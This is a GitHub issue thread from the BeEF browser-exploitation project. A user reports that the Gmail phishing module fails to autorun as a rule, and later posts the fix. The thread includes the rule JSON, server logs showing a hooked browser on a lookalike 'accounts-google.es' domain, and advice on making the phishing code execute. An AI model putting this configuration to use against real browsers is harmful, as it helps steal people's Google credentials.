Google Phishing module doesn't execute properly as an ARE Rule

jme418 commented 6 months ago

First Steps

BeEF Version: 0.5.4.0 Ruby Version: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu] Browser Details (e.g. Chrome v81.0): Causing problems with all I've tried (FF - 115.8.0esr, O - 108.0.5067.29, C - 123.0.6312.86, 123.0.6312.58, 121.0.6167.178) Operating System: Linux, Windows and Android

Configuration

Have you made any changes to your BeEF configuration? Yes.
Have you enabled or disabled any BeEF extensions? Yes, Metasploit one but I do not remember if anyone else, I've been using BeEF for a while.

Steps to Reproduce

Creation of beef/arerules/enabled/gmail_phishing.json

{
  "name": "Google Phishing",
  "author": "jking",
  "modules": [
    {
      "name": "gmail_phishing",
      "condition": null,
      "code": null,
      "options": {
        "xss_hook_url": "https://myaccount.google.com/",
        "logout_gmail_interval": 10000,
        "wait_seconds_before_redirect": 1000
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
}

Starting of beef and loading of the arerules.

msf6 > sudo ./beef -x
[*] exec: sudo ./beef -x

...

[22:46:45][*] [ARE] Ruleset (Fingerprint Browser) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Get Geolocation HTML5 (jking)) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Google Phishing) parsed and stored successfully.
[22:46:45][*] BeEF server started (press control+c to stop)
[22:47:27][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[22:47:27][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
[22:47:27][*] New Hooked Browser [id:1, ip:87.223.76.77, browser:UNKNOWN-124.0.0.0, os:Windows-10], hooked domain [[accounts-google.es:443](http://accounts-google.es:443/)]
[22:47:27][*] [ARE] Checking if any defined rules should be triggered on target.
[22:47:27]    |_  Hooked browser and OS match rule: Fingerprint Browser.
[22:47:27]    |_  Hooked browser and OS match rule: Get Geolocation HTML5 (jking).

[22:47:27]    |_  Hooked browser and OS match rule: Google Phishing.

[22:47:27]    |_  Found [3/3] ARE rules matching the hooked browser.
[22:47:27]    |_  Preparing JS for command id [1], module [fingerprint_browser]
[22:47:27]    |_  Triggering rules [1, 2, 3] on HB 1
[22:47:28]    |_  Preparing JS for command id [2], module [get_geolocation_html5_jking]
[22:47:28]    |_  Triggering rules [1, 2, 3] on HB 1

[22:47:28]    |_  Preparing JS for command id [3], module [gmail_phishing]
[22:47:28]    |_  Triggering rules [1, 2, 3] on HB 1

[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:2, mod: 290, name:'Get Geolocation HTML5 (jking)']
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:1, mod: 291, name:'Fingerprint Browser']

Hooked host view is empty and panel shows that command has been executed???

Re-executing the command it shows properly.

Any clue about what is happening here? Thanks.

github-actions[bot] commented 6 months ago

This issue as been marked as stale due to inactivity and will be closed in 7 days

stephenakq commented 5 months ago

Thank you @jme418. We'll add to our backlog.

jme418 commented 5 months ago

Thank you @jme418. We'll add to our backlog.

Hi there! I got the solution a few hours ago. It's simple: all the functions visible in the command.js file must be placed within beef.execute(function(){/ code here /}). So, instead of separate calls to logoutGoogle(), displayingPhisingSite()... the associated code for those functions must take place within this function block.

beefproject / beef